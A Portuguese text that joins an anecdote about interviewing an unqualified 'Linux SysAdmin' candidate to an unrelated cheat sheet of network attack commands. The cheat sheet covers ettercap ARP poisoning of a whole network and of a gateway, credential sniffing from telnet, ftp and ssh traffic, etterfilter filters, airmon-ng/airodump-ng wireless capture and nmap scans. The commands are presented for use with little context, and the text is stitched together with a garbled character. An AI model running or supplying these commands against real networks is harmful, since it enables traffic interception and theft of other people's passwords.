entrevistei um cara hoje para programação Java, no CV dele tinha "SysAdmin Linux" também.
Pedi pra ele citar uma maneira comos os processos Linux se comunicavam entre sí.
"Linux é bem seguro e deixa os processos isolados", essa foi a resposta dele, dai perguntei sobre outro assunto Kernel Space e User Space, disse que nunca tinha ouvido falar.
Ai complica né, SysAdminLinux. Enfim a experiência do caboclo é subir um Linux EC2 na Aws seguindo tutorial no youtube, conclui isso depois que ele disse que bloqueva as portar pela interface Web de gerenciamento do VPS da Amazon.
Espero que esse cara cai em sí uma hora ou outra.
Verifica apenas o fluxo da pacotes da maquina
* ettercap -Tp
Não realiza a varredura ARP, mas imprime o usuário de a senha e outras informações presentes nos pacotes
* ettercap -Tzq
Realiza o ataque ARP poisoning em todas as maquinas da rede
* ettercap -T -M arp // //
Realiza o ARP poisoning no gateway e nas maquinas entre 1 e 10, a op��o remote habilita o "sniff" do trafego que passa pelo gateway
* ettercap -T -M arp:remote /146.134.30.254/ /146.134.30.1-10/
Obtem os pacotes dos protocolos telnet, ftp e ssh de toda a rede
* ettercap -Tzq //21,22,23
Filtros
#compilar filtro
etterfilter ig.filter -o ig.ef
#executar filtro
ettercap -T -q -F ig.ef -M ARP // //
ettercap -T -q -F ig.ef -M ARP /192.168.22.47/ //
#wireless hacks
airmon-ng start wlan0
#captura clientes perto de vc.
airodump-ng wlan0
#nmap
nmap -O ip
nmap -sS
nmap -Sv
nmap -sNV
netcat
traceroute
tcpdump
hping3